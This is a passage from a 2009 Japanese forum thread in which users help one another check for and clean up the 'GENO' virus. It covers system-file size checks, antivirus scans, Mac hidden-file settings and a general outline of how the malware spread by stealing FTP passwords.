サイトを全て確認してもソースにそれっぽい記述が見つからない
というか、スクリプトも全部自分で書いたのしかない
とりあえず、今はオンラインスキャンしてるけど……
774 :
GENO:2009/05/17(日) 02:48:15 ID:Q7ZKUxk70
>>765 >現在は編集を管理権限者に限定しており、改ざん箇所はありません。
775 :
GENO:2009/05/17(日) 02:48:25 ID:ErQsewcc0
あ、ほんと701にウイルス反応してる
まぎらわしいことよしてー
776 :
ジャーン!:2009/05/17(日) 02:48:42 ID:d/Wo9rrj0
>>754 解除してなくても何にも考えないで実行押したら終了
777 :
GENO:2009/05/17(日) 02:49:03 ID:txLmXpE00
>>755,766
そうか、ありがとう。
なんか特別いいことがあるのかなと思ったけど、最終的には自分の使い勝手だよね
ちょっと試してくるわ
778 :
773:2009/05/17(日) 02:49:23 ID:wLvPYWhg0
ちなみにVistaね
779 :
geno:2009/05/17(日) 02:49:28 ID:WbbmDS0L0
>>771 FTPのパスワードを盗むのがキーロガーによるものかどうかはまだわかってないはず
キーロガーだとしてもキーロガーじゃないとしても
その他のIDやパスワードにも注意したほうがいいことは確かだ
780 :
740:2009/05/17(日) 02:49:54 ID:SFVgMUuu0
セーフでした。教えてくれた人ありがとうございます。
まとめwikiは読んだんですけどこれをきにPCをしっかり勉強します。
781 :
げの報告:2009/05/17(日) 02:50:08 ID:/xot9/jOO
神サイトが感染してた時のショックといったら…orz
歴史創作サイトで感染
782 :
下野:2009/05/17(日) 02:50:11 ID:gqNH/nI10
つかコード貼られるだけで反応するような奴使ってる人って・・・
GENOに感染する奴は感染すべくして感染してるっぽいな。
783 :
な:2009/05/17(日) 02:50:31 ID:eQgBzqzUO
とりあえず怖い奴はavastっていうウイルスアンチソフトでスキャンしとけ
784 :
GENO:2009/05/17(日) 02:50:58 ID:k5Es+N2e0
ジャーン!って換羽ですか
786 :
GENO:2009/05/17(日) 02:51:51 ID:Iji5kOgt0
>>745 そうですか…ありがとうございました。
ファイアーウォールでぐぐって来ます!
787 :
765:2009/05/17(日) 02:52:33 ID:afmNfvO0P
>>769 >>774 すまん、編集が禁止されたのメニューだけかと思ってた
今はもう全ページが編集禁止になってるんだな
789 :
geno:2009/05/17(日) 02:52:44 ID:kDSj2MIb0
2ch見るときは専ブラ使おうよ…
790 :
GENO:2009/05/17(日) 02:53:04 ID:ql8n+M060
おまえら騒ぎたいだけだろ
791 :
ジャーン!:2009/05/17(日) 02:54:06 ID:d/Wo9rrj0
janeで良いジャーン!
792 :
な:2009/05/17(日) 02:54:57 ID:eQgBzqzUO
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
793 :
geno:2009/05/17(日) 02:55:19 ID:4ltajgR70
ジャーン!ジャーン!
げぇ!GENO!
794 :
GENO:2009/05/17(日) 02:56:08 ID:sT6pcuAO0
386=711です。
>>389=400、
>>767 ありがとうございます!
まとめサイトの感染判定で無事だったので、予防策もひとつづつ試していき
最後にこの設定をしようとしたら進めなくなったので助かりました。
有志の皆様のお陰でやれることは大体やりつくした。
だが神経が高ぶって眠れそうにない。
796 :
GENO:2009/05/17(日) 02:57:00 ID:uj1d73AxO
名前欄もまともに入れられないやつは全てスルーでおk?
797 :
GENO:2009/05/17(日) 02:57:31 ID:uQV6yiNu0
>>788 / <三||三||三||三||三三三ヾ、===,、 Z G
ヽ l ||` ||ミ ||三||フ,|| ̄  ̄``ヾミノノ三三ヽ / E げ
ヽ / | | ヽ と 音 は || || ||/|| || __ | |ヽ三三;/| 7 N え
_/ ヽ / | | ま が わ || || ||/|| || ̄  ̄``| |、_ゞ、/|| || -'_O っ
ヤ ___/ ら わ || || ||r‐‡―‡―――‐--、.| | ||| || || ゝ
ヤ ぬ || ||/‡| ヽ、{ (_/``ヽ / | |'‐┘|| || || `>_
_|_______ _ ||,. ‡ | ' ̄ | ≡ l ̄ヽ, ヽ,| | 、||| || ||  ̄//L
_|_____ / ___``ヽ / ‡ |_ヽ0.,/ 三ヾ.0_/二 l| |^i||| || ||
| / // ||ー―--, ,___,ノ | '"~/ ―--三、 | |r'ノ || ‡ ‡
ヽ / / ./' || ( __ニ=― l ヽ、 ヽ、`` | |' l ‡
_/ ヽ / .句| || l /ヽ ̄ ̄``ヽヽ∪ | |)ヽ
_/ | || | / / .| !{ ヽ__ ノ } ノ |/ \二、 、
| || \ ― .| |ヽ ― ̄ ノ//| |(( / >、 \ 、
| / ――― ‐┼  ̄ ,.| |/ |\ _,、,_ / .//,| | )// ヽ、)〉
\_ | || ` ,. - ―/ | |(),l i川川リ //(_,| |// // /
| || / / / ./())| | 川リ //.((_,| |,' // /
| || / |/ /|(()| |ノツ //(())/| .| // /
| || / / /. |(_))| |/ //(())//| | // /
798 :
GENO:2009/05/17(日) 02:57:35 ID:OewM5iMM0
ふたばは感染してないのかな?
799 :
げの:2009/05/17(日) 02:58:20 ID:/hd4HEvi0
800 :
GENO:2009/05/17(日) 03:01:04 ID:PrgIGZV1P
>>736 2008だけど俺もその3つだ
「拒否」が正しいな
細かいけれど修正お願いします
>>3
801 :
GENO:2009/05/17(日) 03:03:03 ID:uCG8VfosO
ノートンは対応しないつもりか?
カスペルスキーに乗り換えようかな
802 :
GENO:2009/05/17(日) 03:03:10 ID:UGfaxfX10
UnderForge of Lackの焼却炉全焼き推奨にすれば、多少マシになるような気がした。
sqlsodbc.chmが表示されない/まとめWikiに新しく上がった要チェックファイルが見つからない場合
・不可視属性ファイルを可視化する→ターミナル起動
不可視含め全ファイル表示:defaults write com.apple.finder AppleShowAllFiles true
リターンしてFinder再起動:killall Finder
全部のFinderが消えて再起動し、不可視ファイルが表示された状態になる。
※戻すとき:defaults write com.apple.finder AppleShowAllFiles false
不可視→可視はTinkerTool、Onyxなどを使うのもおk
TinkerTool:
http://www.bresink.de/osx/0TinkerTool/download.html Onyx:
http://www.titanium.free.fr/pgs2/english/download.html マカー用ウイルススキャンソフト(フリー)
ClamXav:
http://www.clamxav.com/ 左のページナビのDLをクリックすればOSのバージョンごとに案内が出る。
ダウンロードしたらまず「ウイルス定義を更新」をクリックして最新の定義をいれること。
環境設定のスケジュールで定期スキャンが設定できるが、ウイルス定義の更新は自動では
されないので、なるべく使用せず手動スキャン推奨。
フォルダ監視ができるのでサイトのローカル保存フォルダを指定するのは大丈夫。
※Mac対応した亜種が発生して感染しても定義を更新するまで引っかからない可能性がある
※過信しないことが最大のセキュリティ
-----------------ここまで------------------
連投引っかかってた ほんとツギハギしただけでスマソ
詳しい人ツッコミよろしく
804 :
GENO:2009/05/17(日) 03:06:20 ID:7TapFnnMO
>>796 板住人じゃない証拠だしね
普段ならウイルス扱いで誰も相手しない
805 :
GENO:2009/05/17(日) 03:08:40 ID:B5k2mtIVP
今は他板住人も出入りするから仕方ないね
806 :
geno:2009/05/17(日) 03:09:39 ID:F3VlOqPh0
807 :
GENO:2009/05/17(日) 03:10:00 ID:EubD8DPe0
小規模な同人系リンクサイトを運営しています。
Mac機で全部リンク先チェックしにいきました。
1件アウトでしたのでリンクurlをダミーに置き換えて仮登録にして
当該サイトの管理人に対策要請のメールを送りました。
ジャンルは既に報告されているので書きませんが
他人事だと思ってたわけじゃないけどほんとに火の粉が降ってきたので慄然としているところです
808 :
GENO:2009/05/17(日) 03:11:43 ID:radNm57b0
ごめん名前抜けてた・・・orz
とりあえずジャンル幸に緊急のお知らせですってメルフォから送った
幸の最後の更新06年だが気づいてもらえるだろうか・・・
809 :
GENO:2009/05/17(日) 03:12:16 ID:EISHhTCv0
>>694,
>>773 自分も全く同じサイズ。
更新日は4/16だったけど
まあカーネル関係ないっぽいし
810 :
GENO:2009/05/17(日) 03:13:15 ID:PJLnt0u30
まとめ管理人様、乙です。
Vistaです。
アドビ Playerを削除しました。
Acrobat Readerは仕事で使うので、
最新の物を入れました。
Java切り・IE8導入しました。
ウィルスバスターは入っています。
質問です。
Acrobat ReaderおよびPDFの拡張子割り当て機能の
外し方がわかりません。
「C:\Windows\Help\mui」以下のディレクトリの
「C:\Windows\Help\mui」をどうやって画面上に
表示させるのかがわかりません。
どのキーを押せばいいのでしょうか?
811 :
GENO:2009/05/17(日) 03:13:34 ID:ANsojTlv0
スマン、マジで
>>803の意味がよくわからない。
sqlsodbc.chmとMacに何の関係があるんだ?
812 :
GENO:2009/05/17(日) 03:15:22 ID:NbSD/90y0
サイト巡りしたいのに怖くてできん…
まだ報告あがってないけど油断はできないよなー
813 :
GENO:2009/05/17(日) 03:15:38 ID:dXtgRyScO
ウィルスって誰かが作ったもんなの?そんな高度なウィルスなんて作れるもんなんですか?
だとしたら嫌だな
814 :
GENO:2009/05/17(日) 03:16:28 ID:NfFnEcJ60
いいかげんチラ裏報告とか自分がセーフだったとか
まとめやスレ見ればわかることを質問するのやめないか
>>803 詳しくていいんだけど、マカーは今のところ感染報告が一切ないわけで
そこまで場所を割いて懇切丁寧な説明が必要なのか疑問。
被害が深刻なWinより丁寧になってるよ?
もっと詳しい対策をとりたい人はマク板や脳板へぐらいでいいんじゃないの
815 :
GENO:2009/05/17(日) 03:18:43 ID:ovODOE7+0
>>760 横から失礼します
FirefoxのアドオンでAdobe Reader があったんですが
それがアップデートしたらアドオンから消えてるみたいなんです
スタート→プログラムではAdobe Reader の最新バージョンになってるんですが
FirefoxのアドオンではAdobe Reader の代わりに?Adobe Acrobat でいいんでしょうか
816 :
げの:2009/05/17(日) 03:18:51 ID:/hd4HEvi0
817 :
ge:2009/05/17(日) 03:20:46 ID:5CCIkoK20
>>814 一応、同人関係で初心者マカーもいるし、いいと思うよ
mac板はちょっと初心者さんには壁が高い
情報も錯綜しているし、逆に脳板やマカ板ではまずいとおもうよ
818 :
GENO:2009/05/17(日) 03:20:49 ID:TltNoyAA0
お前ら馬鹿すぎ
こんな低性能ウイルスなんぞ常時に隣り合わせだと知れ
819 :
GENO:2009/05/17(日) 03:21:50 ID:AU6DATBA0
cmd.exeもregedit.exeも起動しない
sqlsodbc.chmは1,323 バイト
更新日時は2009年3月21日、23:07:24
これって感染してるってこと?
自分サーチ運営してるんだが、閉鎖したほうが良いのだろうか。
ソース見た限りではサーチは感染していないようなのだけれど。
820 :
GENO:2009/05/17(日) 03:23:05 ID:5w24I2bc0
>>819 どう見ても真っ黒です本当にありがとうございました
821 :
GENO:2009/05/17(日) 03:23:16 ID:U33DfpPQ0
822 :
GENO:2009/05/17(日) 03:23:58 ID:0jOyX3Xk0
>>819 クロいと思う、PCのほうは。
もしFTP更新してないならサイトは大丈夫なんじゃない?
クリンインストがいいと思うよ
823 :
GENO:2009/05/17(日) 03:24:14 ID:VGXelXZT0
IE8報告があるけど、IE8は画像経由で感染しないってだけだよな
火狐やそのほかのブラウザが推奨されてるのは、簡単にjs切れるからってことでおk?
ウイルスの爆撃対象になってるのはどれも同じなんだよね?
火狐でflash player導入しようと思ったらおそらくvistaにはねられた
vista使いで火狐考えてる人はflash player一筋縄じゃいかないかも
824 :
GENO:2009/05/17(日) 03:24:39 ID:Li8gjXxiO
>>819 ログ読むなりまとめサイト見るなりして判断しろ
登録してる奴の為にも早くクリーンインスコしろ
825 :
GENO:2009/05/17(日) 03:24:50 ID:EISHhTCv0
>>819 ベッタベタの黒ですな
閉鎖するにしても、感染してないPCからした方がいいんじゃない?
826 :
GENO:2009/05/17(日) 03:26:01 ID:aTSY2Ugx0
>>819 サイトが感染してないなら下手に動かすのも危ないしひとまず放置
パソコンはクリーンインスコ
前にも同じような人いるんだからまずはログ検索するなり努力しなよ
そんなんだとまた違うウイルスに感染するかもよ
827 :
GENO:2009/05/17(日) 03:26:11 ID:sgTFtngZ0
>>823 flash playerなんてUACで許可してやればインストールできるでしょ
828 :
GENO:2009/05/17(日) 03:26:23 ID:6AGXqS5ZO
cmdが起動しない
バイト数が明らかにおかしい
要注意だな
829 :
GENO:2009/05/17(日) 03:26:42 ID:hrMl/A7T0
vistaで、C:\Windows\Help\mui\0411までいけるのにsqlsodbc.chmがないんですが‥どうすれば、、
830 :
GENO:2009/05/17(日) 03:27:17 ID:AU6DATBA0
答えてくれた人ありがとう。
サーチは何故かFTP最近使えなくて(これはウィルス関係ある?)
最近はずっとファイルマネージャでアップロードしてたんだけど大丈夫かな?
聞いてばっかりですいません
831 :
GENO:2009/05/17(日) 03:27:27 ID:9zPuFtPL0
>>819 本人は確実に感染してるけどサーチはセーフならおいといた方が混乱が起きない気もする
とりあえず早急にクリーンインストしれ
832 :
うぃ:2009/05/17(日) 03:27:33 ID:PwE0mLBlO
sqlsodbc.chmが49.5kbyte
アウセフ?
833 :
GENO:2009/05/17(日) 03:28:09 ID:VGXelXZT0
>827
UACで許可出した後に「この動作を停止しました」っていうのが出るんだ
他のexeを実行したときにも同じ症状が出て、そのときもvista特有の対処が必要だったから
今回もそれだろうと思ったんだが
835 :
うぃ:2009/05/17(日) 03:29:00 ID:PwE0mLBlO
×sqlsodbc.chmが49.5kbyte
〇sqlsodbc.chmが47.5kbyte
半端な…
836 :
GENO:2009/05/17(日) 03:29:13 ID:VGXelXZT0
>>832 まとめも見れないようなカスはパソコン切って寝てろ
837 :
GENO:2009/05/17(日) 03:29:26 ID:dXtgRyScO
パソコン普通に起動して普通にネットに繋がる状態なら、まだウィルスには感染してないってことで大丈夫かな
同人板には「テンプレを読んではいけません」「スレを一通り読むのも禁止」
「ちょっと調べればすぐに分かることでも人に聞いて無駄にスレを進行させろ」
みたいなローカルルールでもあるのか?
いくらなんでも酷すぎるだろ
839 :
GENO:2009/05/17(日) 03:30:57 ID:wLvPYWhg0
>>810 今は気軽にググれと言える状況じゃないし、混乱してるだろうから書く
スタート(左下の窓のアイコン)→コンピューター→Windows Vista(C)→Windows
→Help→mui
この後は0409か0411かわからないけど、数字の羅列のフォルダがあるから
お探しのものはそこの中
ついでに数人の友だちに聞かれたから書いておくけど、
「ファイル名を指定して実行」は、vistaの場合スタートのところから
起動できるようになってない(いじってなければ)
スタート開いて窓アイコンのすぐ上に検索のためのテキスト領域あるから
そこにそのまま「ファイル名を指定して実行」と書けば起ち上がる
840 :
GENO:2009/05/17(日) 03:31:04 ID:NfFnEcJ60
>>803を勧められない理由は不可視ファイルの可視化。
普段やりつけない人がやるにはリスクがある。
それよりClamXavのスキャン指定で不可視ファイルにアクセスするほうが
現実的で早くないかな
ttp://ewa4618.wed.macserver.jp/ >不可視フォルダにアクセスするには、キーボードでまず“/”を入力し、
>続けて目的のフォルダのフルパスを入力してください。
↑フォルダの位置さえはっきりしていればこれでおk
841 :
GENO:2009/05/17(日) 03:31:14 ID:nyEd19m/P
842 :
GENO:2009/05/17(日) 03:31:21 ID:WbbmDS0L0
>>833 なんかインストールするときたまにそういうことあるわな
このスレで聞いてもしょうがなさそうだ
843 :
GENO:2009/05/17(日) 03:31:30 ID:k/dYf2fw0
そういやひとつ気になってたんだけど。
プニル使ってるんだが、プニルでJavascript切る設定にしておけば
IEのインターネットオプションでJavascript無効にしなくても大丈夫なのかな。
専ブラもJavascript使ってるから
無効にすると動作おかしくなってかなり使いづらいんだ。
844 :
GENO:2009/05/17(日) 03:32:10 ID:q60UNV0G0
845 :
GENO:2009/05/17(日) 03:32:36 ID:o++pde6y0
>>838 つ「人の話を聞かない女ども」
つ「そんな女を馬鹿ねぇと言いながらも構いたがる女ども」
846 :
GENO:2009/05/17(日) 03:33:06 ID:sgTFtngZ0
>>833 うちの環境ではその不具合は出てないな
今まで更新かけたときもそのようなエラーは出てない
個体差はあるかもしれんが
847 :
GENO:2009/05/17(日) 03:33:40 ID:+0fRi4EKP
>>832 真っ黒
電源切ったら終わりだから
クリーンインストールしとけよ
848 :
GENO:2009/05/17(日) 03:34:05 ID:bXSSMF4+0
849 :
GENO:2009/05/17(日) 03:34:42 ID:XNVbLvq20
>>830 何するにしても本当に完全に100%全ページ大丈夫なのを確認してな
残しとく場合クリーンインスコしたら即パスとかも変えて
850 :
GENO:2009/05/17(日) 03:35:19 ID:dXtgRyScO
パソコンに感染したら調べなくても起動した段階や操作中に一目で分かる?
分からないままネットしてたらどうしよう
851 :
GENO:2009/05/17(日) 03:35:36 ID:aTSY2Ugx0
>>844って感染サイトじゃなかったっけ
気をつけて
852 :
GENO:2009/05/17(日) 03:36:22 ID:RXQP0KHu0
一応ウイルスセキュリティでは白
もし感染してる場合、一度電源切ったら再起動しないオワタ状態になる?
853 :
GENO:2009/05/17(日) 03:36:46 ID:EISHhTCv0
>>838 調べようとしない思考が停止した人たち
>>845 俺とかいってるやつもいるし男もいるっしょ。
圧倒的に女が多いけど。
854 :
GENO:2009/05/17(日) 03:37:36 ID:Izv+58ucO
規制中なので携帯から失礼
コマンドプロンプトは感染初期に立ち上げると重症化するようだ
確認はディレクトリの方を推奨
855 :
GENO:2009/05/17(日) 03:38:06 ID:pi0gLCtU0
856 :
GENO:2009/05/17(日) 03:38:37 ID:z4D8dWCI0
>>850 一目で分からないから、知らずにバラまく人がいるのであって
分からないままネットしないようにスキャンするんですよ。
857 :
GENO:2009/05/17(日) 03:38:56 ID:bXSSMF4+0
個人的にはFTPのパス抜いてーってのが抜き方はいくらでもあるが物凄く現実味が無い
アカウントハッキングが目的ならまだしもHTML改変ならローカルに保存されている
HTMLファイルを直接改変するようにした方が良いだろうに・・・
858 :
GENO:2009/05/17(日) 03:39:56 ID:pXdD/uNN0
>>816 一応読んではみたんだけど。不可視属性もなにも、sqlsodbc.chmはWindowsの話であって、Macには関係ないだろ?
>>803で何を可視化しようとしてるのかわからないんだ。
それと、Adobe ReaderはHFS+でCase Sensitiveにしてる場合、環境設定が動作しないんじゃないかと思う。
大文字小文字を区別しないってやつ。
859 :
GENO:2009/05/17(日) 03:40:02 ID:UGfaxfX10
>>857 FTP通信を盗聴するトロイが内部に潜んでいると考えてみたらどう?
860 :
GENO:2009/05/17(日) 03:42:29 ID:pXdD/uNN0
すまん、
>>858の「区別しない」は間違い、「区別する」が正しいです。
861 :
:2009/05/17(日) 03:42:39 ID:WbbmDS0L0
>>859>>857 今のところローカルのHTMLファイル自体が改変されたという報告がないだけじゃない?
862 :
GENO:2009/05/17(日) 03:42:59 ID:/QQFgMqg0
テンプレやまとめサイトに書いてあることなら「そこに書いてあるから読め」とだけ答えろよ
既出の質問なら「同じ質問があるから探せ」で終わらせろ 絶対に答え(エサ)はやるな
「次からは読んでね」なんて注意しても聞かない しつけのなっていない犬畜生以下のバカなんだから
お手やお座りをする前にエサをやったって覚えるわけないだろ
863 :
GENO:2009/05/17(日) 03:44:37 ID:NfFnEcJ60
>>858 Macだけなら無関係だが、BootCampでWin入れてるマカー用でしょ
Mac側から感染をチェックしたい場合ってことじゃないの?
説明不足だし、自分もその項目は不要な気がする。
マカでもブーキャンWinしてたら、Winでやらなきゃいけない対処はどうせ全部やるべきだから
864 :
GENO:2009/05/17(日) 03:45:27 ID:C9Hc9U/u0
まとめサイト用レス書いてるつもりの奴は
ちゃんと
>>3って入れてくれ
でないと管理人氏にスルーされて無駄になるぞ
865 :
GEO:2009/05/17(日) 03:45:49 ID:nQ7xGg9OO
既出の質問への答えも理解できないんじゃね?
866 :
GENO:2009/05/17(日) 03:46:59 ID:75lN/Fis0
IDはあぼ〜んできるから便利だなぁ
867 :
geno:2009/05/17(日) 03:48:43 ID:UQnEuMJQ0
>>863 >Macだけなら無関係だが、BootCampでWin入れてるマカー用でしょ
>>726にそのあたりの説明は書いたつもりなんだが、足りなかったか
一応その項目について書くべきかは
>>3の人に確認した上でのことなんだ
868 :
GENO:2009/05/17(日) 03:48:45 ID:z4D8dWCI0
>>858 MacのBootCampっていう機能で、OSXとWindowsがデュアルブートできるんだよ。
MacにWin入れてる人向けの話。
自分もマカでブーキャンしてるけど、ターミナルいじるとなると敷居が高い。
869 :
geno:2009/05/17(日) 03:50:35 ID:SK1PylRj0
>>832 プロパティ見て50727byteならセフセフらしいけど
870 :
810:2009/05/17(日) 03:52:37 ID:PJLnt0u30
>>839 本当にわからなかったので助かりました!
ありがとうございます。感謝しています。
871 :
GENO:2009/05/17(日) 03:53:19 ID:pi0gLCtU0
Mac等のマイナーOS使ってる奴なんて大概Windowsも入れてるからなあ(そうでないとネット使う上で不便すぎる)
VISTA〜以外のOSは安心できなくなったなあ
872 :
geno:2009/05/17(日) 03:53:44 ID:UQnEuMJQ0
>>867 >その項目に
ごめんコレ不可視→可視化の方法ね
ホント頭ねてるわ…
>>858 >Adobe ReaderはHFS+でCase Sensitiveにしてる場合、環境設定が動作しないんじゃないかと思う。
これが自分にはよくわからないので詳しい人お願いします
873 :
GENO:2009/05/17(日) 03:53:54 ID:bXSSMF4+0
>>859 暗号化されて無いから盗み易いってのは判るが盗む→IDPASSをメモリ上に読み込むorファイル出力
→そのデータからサーバーにログインして直接改変ってのは・・・・・・
874 :
GENO:2009/05/17(日) 03:54:48 ID:RuhT70SC0
875 :
GENO:2009/05/17(日) 03:55:14 ID:UU9jDQxF0
自分マカでブーキャンなんだがwinでサイト見てなきゃ問題ないよな?
しかしウイルスの広まり具合すごいな
ブクマめぐってみたら数日前はなかったのに
ほとんどのサイトがウイルス警告してた
876 :
GEMO:2009/05/17(日) 03:57:56 ID:9LeFd5x0O
さっきMediaManager久しぶりに起動させたんだが何度やっても読み込み途中で終了になる
でもこれってウイルスとは関係ないよな…?初心者ですまん
ちなみにsqlsodbc.chmのサイズは問題ない
877 :
GENO:2009/05/17(日) 04:02:50 ID:RuhT70SC0
>>876 不安ならクリーンインストールしてスッキリすればいいよw
878 :
GENO:2009/05/17(日) 04:12:20 ID:8BxiMwcD0
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7
./ ./ ̄/ / /__/ / / ____  ̄ / /
'ー' _/ / ___ノ / /____/ ___ノ /
/___ノ /____,./ /____,./
_ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7
/ ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._
 ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./
/__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
これ最強
879 :
geno:2009/05/17(日) 04:13:26 ID:KFLP4Q6J0
>>875 同じくマカでブーキャンしてて、Winでサイトはみてない
上記にあるようにWinにMac上から最新ClamXavをかけてみたが
今のところなにもなかったようだ
しかしうちのジャンル、感染報告あるのに
どのサイトいってもウイルス警告なかったぞ
うちは偏狭のしがないサイトだからなあ…
誰か気づいてくれるといいんだけど
880 :
GENO:2009/05/17(日) 04:16:09 ID:kfZ+86BYO
ここで勧められてるavastインストールしたら再起動要求後、OS立ち上がる前にスキャン開始。
XP起動してログイン時に個人プロファイルが壊れてますとか何とか出て
一度は立ち上がったんだけど、再起動したら黒い画面から動かなくなった…。
avastいれる前の感染チェックでは白だった。
元々HDDが寿命寸前だったのもあるかもしれないけど、HDD逝ったのは確実なのかな。
ウイルスとは微妙に関係なくてスマソ。スレ違いなら誘導してもらえると助かります。
881 :
geno:2009/05/17(日) 04:17:50 ID:ANsojTlv0
BootCampは使ったことないんだけど、MacのFinderで不可視属性のファイルを可視化するよう設定しなくても、
マウントしたNTFS(あるいはFAT)パーティションの隠しファイルは見えるような気がするんだけど違うのか。
882 :
GENO:2009/05/17(日) 04:18:47 ID:/QQFgMqg0
たとえPCに詳しくなくても日本語は読めるだろ
そしてここに書き込めるということは、ブラウザの入力欄がどこか知っていて
そこにマウスカーソルを合わせて文字の入力が出来る状態にして
キーボードで文字が打てて書き込みボタンを押せるってことだろ
それだけ出来れば十分だよ 「自分で調べられる」んだよ 何でそうしないんだよ?
883 :
GENO:2009/05/17(日) 04:20:12 ID:9zPuFtPL0
>>880 元々入ってたアンチウイルスソフトはアンインストールした?
884 :
GENO:2009/05/17(日) 04:24:09 ID:cEUXCfW3O
>>875 セキュリティがwindowsより甘いMACだけど、
ウイルスが対応していない間は大丈夫
対応される前にバックアップとっておくべし
まとめてアップデートで解決しないでくださいよ……
885 :
geno:2009/05/17(日) 04:24:31 ID:0OIx/FVg0
まとめサイトのcmd実行、
ファイルの容量を確認して問題なかったんだけど
オンラインスキャンをしたらなんかBackdoorタイプのウィルスに
感染してたらしく、削除して終了したんだけど
これってやばいの?
GENOウィルスって調べてみたけど
トロイとかバックドアとかそういう種類がよく分からないんだけど何に属するの?
886 :
GENO:2009/05/17(日) 04:26:14 ID:bXx5OxTb0
@Niftyのウイルスチェックで Trojan-PSW.Win32.Kates.c が出たぜー\(^o^)/
駆除出来ないのなこれ
887 :
GENO:2009/05/17(日) 04:27:52 ID:MJckJOI9O
>>880 のーとん先生に嫉妬するって友達が言ってたけどそういうことでなくて?
888 :
GENO:2009/05/17(日) 04:30:09 ID:uXFgy9tA0
・sqlsodbc.chmのファイルサイズおk
・niftyオンラインスキャン問題なし
・ウイルスバスターでも問題なし
・チェッカー?にぶち込んでもおk
・自サイトのソースもおk
だったんだがこれは白でおkですか?
感染するのも怖いが何より自分がばらまく可能性があるとなると・・・・・・
889 :
GENO:2009/05/17(日) 04:30:32 ID:+sqfn+4M0
sqlsodbc.chmが49.5kb(50.727バイト)
Vistaなんだけど大丈夫?
890 :
GENO:2009/05/17(日) 04:31:13 ID:3+n4Bxrc0
891 :
GENO:2009/05/17(日) 04:31:53 ID:EfuA3f1a0
さすがにこの時間だからかスレ進行がゆっくりになってきたな
絶対ヤバいと踏んでいた弟のマシン(XP)チェックしたけど異常なし
親のノートはMeとVistaで異常なし、マイマシン(XP)も未だ異常なし。
噂立ってすぐ対処始めたのも良かったんだろうけど
スレ見てると、基本的に運がよかったんだなウチは…と思うわ
明日の夕方、イベント終了後からはオフに意識行ってた人がこっち流れてきてスレ加速するだろうけど
まとめ見れば分かりそうな質問には
>>3で済ませんの?
それともどっかで提案あったテンプレレスみたいなの用意しとくの?
892 :
GENO:2009/05/17(日) 04:31:54 ID:aTSY2Ugx0
893 :
GENO:2009/05/17(日) 04:31:59 ID:33WthBq40
>>882 ググると感染やらなんやら言われてるからじゃねーの?
894 :
GENO:2009/05/17(日) 04:34:07 ID:3+n4Bxrc0
895 :
GENO:2009/05/17(日) 04:34:51 ID:nyEd19m/P
>>893 ググらんでもまとめWiki見ればよくね?とは思う。
ググっただけで感染というのは、あり得るとすればFirefoxで先読み機能放置状態の時だけだな。
それを切る方法もまとめWikiには書いてある。
まとめWikiのアドレスは
>>1に貼ってある。
896 :
geno:2009/05/17(日) 04:36:04 ID:YTQWI9820
>>873 >>859だと思うぞ
関連サイトから↓
---
ホームページに不正に埋め込まれたJavaScriptやIFRAMEが不正に SWFやPDFを開かせる
アップデートを行っていないユーザの脆弱性で、Flash Player や Adobe Acrobat Readerがクラッシュ。
クラッシュ時にマルウェア(PE型:xxxxx.exe)を実行。
実行されたマルウェアは、内部にトロイを埋め込み、感染PCのインターネットアクセスを監視、特に FTPアクセスを監視して ID/Passwordを盗む。
盗んだID/Passを使って、ホストへ(おそらく自動巡回で)不正侵入、改ざんコードを埋め込む
897 :
GENO:2009/05/17(日) 04:36:19 ID:uXFgy9tA0
>>888ですが全部読んだ上で書き込んでます
wikiも見ました
誰かに大丈夫といって貰いたかったのかもしれないです
すまない、そしてありがとう
898 :
GENO:2009/05/17(日) 04:37:30 ID:ANsojTlv0
>>895 標準の先読み機能に問題はないと何回いったらわかるんだよ。
899 :
GENO:2009/05/17(日) 04:38:16 ID:WbbmDS0L0
900 :
GENO:2009/05/17(日) 04:38:59 ID:kWWUBIY10
サイトに注意喚起してきた。(もち白でした)
最近全然更新してない弱小サイトだから2人/日くらいしか来ないけど。
FTPもクレジットカードも使わないから、あんま危機感ないけど他の人はそうじゃないもんな。
ここ二ヶ月くらい同人サイト巡ってなくて逆によかったかもなぁ。
901 :
geno:2009/05/17(日) 04:39:24 ID:33WthBq40
>>895 だから俺に言うんじゃねー
聞いたやつに言えよ。というか全文を嫌になるほどコピペしてやれ
902 :
GENO:2009/05/17(日) 04:40:55 ID:nyEd19m/P
903 :
GENO:2009/05/17(日) 04:43:58 ID:j8yb3I9zO
感染したらどうなるってのも変えた方が良いんじゃないの?
サイトが勝手に書き換えられて閲覧者にも感染するのが一番押し出されてるのが同人板らしいと言えばらしいが
コピペだけど
主な症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
904 :
880:2009/05/17(日) 04:44:17 ID:kfZ+86BYO
